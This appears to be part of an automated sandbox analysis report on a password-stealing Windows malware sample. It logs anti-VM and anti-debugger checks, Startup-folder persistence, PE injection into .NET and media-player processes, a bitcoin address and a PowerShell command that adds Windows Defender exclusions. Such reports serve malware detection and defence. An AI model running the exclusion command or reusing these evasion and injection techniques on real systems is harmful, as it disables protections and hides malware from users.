                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 6544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 3304Jump to behavior
                  Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9998Jump to behavior
                  Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9995Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeWindow / User API: threadDelayed 7531
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeWindow / User API: threadDelayed 1845
                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9994
                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9975
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeWindow / User API: threadDelayed 9998
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeWindow / User API: threadDelayed 9999
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6907
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_12-16211
                  Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-14931
                  Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
                  Source: C:\Windows\System32\svchost.exeAPI coverage: 6.4 %
                  Source: C:\Windows\System32\svchost.exeAPI coverage: 4.4 %
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeAPI coverage: 1.2 %
                  Source: C:\Windows\System32\svchost.exe TID: 3168Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 6640Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 760Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 760Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 6792Thread sleep count: 6544 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 6792Thread sleep count: 3304 > 30Jump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5504Thread sleep count: 9998 > 30Jump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5504Thread sleep time: -9998000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 4636Thread sleep count: 9995 > 30Jump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 4636Thread sleep time: -9995000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 2052Thread sleep time: -75310s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 5376Thread sleep time: -1845000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 6176Thread sleep count: 9998 > 30
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 6176Thread sleep time: -9998000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2468Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exe TID: 1836Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Program Files\Windows Media Player\wmplayer.exe TID: 7036Thread sleep count: 9999 > 30
                  Source: C:\Program Files\Windows Media Player\wmplayer.exe TID: 7036Thread sleep time: -9999000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep count: 6907 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 6528Thread sleep count: 113 > 30
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 6528Thread sleep time: -113000s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB14DCE0 FindFirstFileExW,2_2_00000142DB14DCE0
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A04DCE0 FindFirstFileExW,4_2_000001F28A04DCE0
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D0748DCE0 FindFirstFileExW,7_2_0000023D0748DCE0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3CDCE0 FindFirstFileExW,12_2_000002109C3CDCE0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB63DCE0 FindFirstFileExW,23_2_00000200AB63DCE0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFADCE0 FindFirstFileExW,41_2_000001DDEEFADCE0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CE9DCE0 FindFirstFileExW,42_2_000001932CE9DCE0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE544E38 VirtualQuery,GetSystemInfo,16_2_00007FF7FE544E38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: svchost.exe, 00000007.00000002.3897187473.0000023D06638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: svchost.exe, 00000002.00000002.2466233527.00000142DB25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2464735487.00000142D5C27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3899884261.0000023D066C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 0000000C.00000002.3893768041.000002109A3BC000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 0000000C.00000002.3893768041.000002109A348000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 0000001B.00000002.2287968740.0000000000EB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: jsc.exe, 00000003.00000002.3932040211.0000000005BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: spczxf.exe, 00000008.00000002.1738420103.000001A4C3F01000.00000004.00000800.00020000.00000000.sdmp, aspnet_wp.exe, aspnet_wp.exe, 0000000C.00000002.3891911934.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: bc1qemupvduu8mnmjcwsxmt5k3l6a4qyg5dmtt2wtl
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                  Source: utntwb.exe, 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: svchost.exe, 00000007.00000002.3898923157.0000023D066AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXT15E6VMWare
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB14D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00000142DB14D2A4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE544AC0 memset,GetVersionExW,memset,GetSystemDirectoryW,lstrlenW,lstrlenW,LoadLibraryW,GetProcAddress,FreeLibrary,16_2_00007FF7FE544AC0
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB14F830 GetProcessHeap,2_2_00000142DB14F830
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB14D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00000142DB14D2A4
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB147D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00000142DB147D90
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A04D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001F28A04D2A4
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A047D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001F28A047D90
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D07487D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000023D07487D90
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D0748D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000023D0748D2A4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_00401180 SetUnhandledExceptionFilter,12_2_00401180
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_000002109C3C7D90
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3D6218 SetUnhandledExceptionFilter,12_2_000002109C3D6218
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_000002109C3CD2A4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE545D44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF7FE545D44
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE545C50 SetUnhandledExceptionFilter,16_2_00007FF7FE545C50
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE545AB4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF7FE545AB4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB637D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00000200AB637D90
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB646218 SetUnhandledExceptionFilter,23_2_00000200AB646218
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB63D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00000200AB63D2A4
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001DDEEFA7D90
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001DDEEFAD2A4
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CEA6218 SetUnhandledExceptionFilter,42_2_000001932CEA6218
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CE97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001932CE97D90
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CE9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001932CE9D2A4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, LockContentionCountCustomAttributeEncodedArgument.csReference to suspicious API methods: ((MemoryFailPointCopyright)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(InternSendTo.getAssemblyFlagsAssumeUniversal("getKeyPairBindToField")), InternSendTo.getAssemblyFlagsAssumeUniversal("MaybeCastopLeftShift")), typeof(MemoryFailPointCopyright)))(ExecutingCallbackIdThread, LocalAppContextSwitchesgetNormalMantissaMask, cDisplayClass60ITaskAwaiter, out getItem6ContextualReflectionScope)
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, LockContentionCountCustomAttributeEncodedArgument.csReference to suspicious API methods: ((MemoryFailPointCopyright)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(InternSendTo.getAssemblyFlagsAssumeUniversal("getKeyPairBindToField")), InternSendTo.getAssemblyFlagsAssumeUniversal("MaybeCastopLeftShift")), typeof(MemoryFailPointCopyright)))(ExecutingCallbackIdThread, LocalAppContextSwitchesgetNormalMantissaMask, cDisplayClass60ITaskAwaiter, out getItem6ContextualReflectionScope)
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                  Source: msbuild.exe.27.dr, NativeMethodsShared.csReference to suspicious API methods: OpenProcess(eDesiredAccess.PROCESS_QUERY_INFORMATION, bInheritHandle: false, processIdTokill)
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeMemory written: C:\Program Files\Windows Media Player\wmplayer.exe base: 140000000 value starts with: 4D5A
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeThread register set: target process: 1340
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeThread register set: target process: 5872
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeThread register set: target process: 1204
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeThread register set: target process: 3288
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 40A000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 40C000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: F00008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 401000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 404000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 40C000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 438000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 439000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 43A000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 43B000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 43C000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 43D000
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: BA8D82A010
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe base: 140000000
